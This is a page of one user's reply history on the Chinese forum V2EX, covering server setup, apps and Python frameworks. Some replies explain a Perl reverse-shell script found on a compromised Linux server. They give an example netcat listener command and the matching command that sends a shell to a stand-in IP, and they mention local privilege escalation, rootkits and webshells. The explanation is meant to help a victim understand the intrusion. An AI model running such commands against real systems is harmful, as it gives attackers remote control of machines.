V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  fucker  ›  全部回复第 20 页 / 共 36 页
回复总数  711
1 ... 16  17  18  19  20  21  22  23  24  25 ... 36  
2017-06-19 08:29:16 +08:00
回复了 ydxred 创建的主题 程序员 废人一个了,Windows Server 2016 搭建网站问题求解
2017-06-19 08:25:17 +08:00
回复了 ydxred 创建的主题 程序员 废人一个了,Windows Server 2016 搭建网站问题求解
我开了台某云的 win2016, 没问题啊,没做设置一切正常啊。。。
@ydxred
2017-06-19 07:56:07 +08:00
回复了 ydxred 创建的主题 程序员 废人一个了,Windows Server 2016 搭建网站问题求解
@ydxred 黑阔圈啊,同安全爱好者 =-=
2017-06-18 19:18:34 +08:00
回复了 ydxred 创建的主题 程序员 废人一个了,Windows Server 2016 搭建网站问题求解
1L 说了安全组开 80 端口,另外大牛带我入圈子行吗 :D
@avrillavigne 图吧机佬
ctf/黑客闯关游戏?
2017-06-16 08:25:30 +08:00
回复了 lesloli 创建的主题 PHP PHP 绕过验证密码问题
有很多种方法
2017-06-15 09:06:09 +08:00
回复了 gunshot 创建的主题 程序员 高考完的女孩怎么入门 CS?
@lydhr #25 没看出楼主或其他人对女孩的不尊重
2017-06-13 12:24:44 +08:00
回复了 shmilyin 创建的主题 Linux 服务器是不是被植入后门了? Linux 大神帮忙分析下
@xustrive 无论软 /硬防我个人觉得(可能有误)要看入站 /出站规则吧,另外它里面的日志可以用来取证。
你说一下我讲的哪一段你没有看出来,我再解释解释。
2017-06-13 12:22:15 +08:00
回复了 shmilyin 创建的主题 Linux 服务器是不是被植入后门了? Linux 大神帮忙分析下
@hellove1985 我前面描述有误,感谢指正。python 的确可以一行代码,比如一些 web 服务器和模板的命令执行漏洞( flask+jinja2 )都是一行 Python 做到的。
2017-06-12 19:59:03 +08:00
回复了 shmilyin 创建的主题 Linux 服务器是不是被植入后门了? Linux 大神帮忙分析下
@pq 再补一条,这个反弹 shell 的脚本其实并不具备后门的特征,也不会给取证带来什么方便,简而言之,就是用这样的动态语言写的脚本其实并不会暴露黑客的信息,当然,在建立连接的时候,[可能]会在 history 里面留下黑客服务器的 IP 地址,网关那里也可能会有,但是这些代码并不会直接暴露黑客的信息,所以这代码是否源码可见对他来说都是安全的。
2017-06-12 19:54:42 +08:00
回复了 shmilyin 创建的主题 Linux 服务器是不是被植入后门了? Linux 大神帮忙分析下
@pq
1.老旧的 linux/unix 服务器通常自带 perl,尤其是 unix (尤其在日本,日本很多老旧站点都是 perl cgi 开发的)。
2.perl 和其他多数语言一样,分号结尾,所有代码可以写在一行(显然这次是个例外),这样有个好处,就是在遇到命令执行漏洞的时候,非常管用,而 Python 做不到。
3.许多(老旧的包括现在,尤其是老旧的)服务器在生产环境下是不存在 c/cpp 编译环境的,但是国内很多 linux 服务器却都拥有编译环境。(编译环境对于本地提权来说是非常必要的,当然交叉编译 /自建环境编译除外,这些都很容易出错)
4.如 13 楼所说,临时用的,一般这种脚本在执行之后,都会立即进行提权,然后植入 rootkit,那些才是真正的后门,隐蔽性极高,没有取证 /渗透经验的人,通常是找不到的。这一次显然是由于黑客疏忽 /权限问题没有清除。
2017-06-12 18:44:09 +08:00
回复了 shmilyin 创建的主题 Linux 服务器是不是被植入后门了? Linux 大神帮忙分析下
@xustrive
这个 perl 脚本接受两个参数,一个是监听服务器的 ip,一个是端口,这段代码就是把 sh shell 反弹到刚才所说的监听服务器上。那个监听服务器一般是用 netcat 做端口监听,接收 socket,命令一般是 `nc -lvp [port]`
假设黑客的监听端口是 2333, 服务器 IP 是 1.2.3.4, 那么黑客会在 1.2.3.4 这台服务器上运行 `nc -lvp 2333`
然后在楼主的服务器上运行 `perl envl_bc 1.2.3.4 2333`
如果网络顺畅的话,黑客就可以直接在他的服务器( 1.2.3.4 )直接控制楼主服务器的某个权限的 shell 了
多年前,大多数情况是服务器 web 服务存在漏洞,黑客利用这样的 shell 反弹技术运行 localroot(本地提权)程序 /脚本。
所以建议楼主查一下 web 服务(或不限于 web 服务)是否存在漏洞。
估计 web 目录已经躺着好几个 webshell 了。
2017-06-12 16:24:03 +08:00
回复了 ghostheaven 创建的主题 分享发现 打算搞个 SSD 主控的 U 盘,求新玩法
前几天刚入他们家的 U 盘,现在正在这个 U 盘上做的 manjaro 上回帖
2017-06-12 08:11:51 +08:00
回复了 fucker 创建的主题 Python 还有人在用 web.py 吗?
@wzw 任何关于安全的代码都自己写啊!
2017-06-11 16:23:14 +08:00
回复了 fucker 创建的主题 Python 还有人在用 web.py 吗?
@wzw 要什么功能我都自己写,而且 python 那么多库
2017-06-11 12:40:01 +08:00
回复了 fucker 创建的主题 Python 还有人在用 web.py 吗?
@wzw 我也还在用啊,这有什么关系~
2017-06-08 18:26:50 +08:00
回复了 Light3 创建的主题 是不是要放弃饿了么 转战美团了..
我都是用一段时间 饿了么 然后用一段时间 美团, 前几天想起来还有个百度外卖,但是没有优惠,就又删了。。
2017-05-26 09:00:03 +08:00
回复了 fhc023 创建的主题 程序员 一起来结对编程吧!
@xiahei 已联系,telegram
@fairyStage #7 其实我是好奇你因为驱动支持的问题经历了什么样的磨难
1 ... 16  17  18  19  20  21  22  23  24  25 ... 36  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2785 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 41ms · UTC 00:36 · PVG 08:36 · LAX 16:36 · JFK 19:36
Developed with CodeLauncher
♥ Do have faith in what you're doing.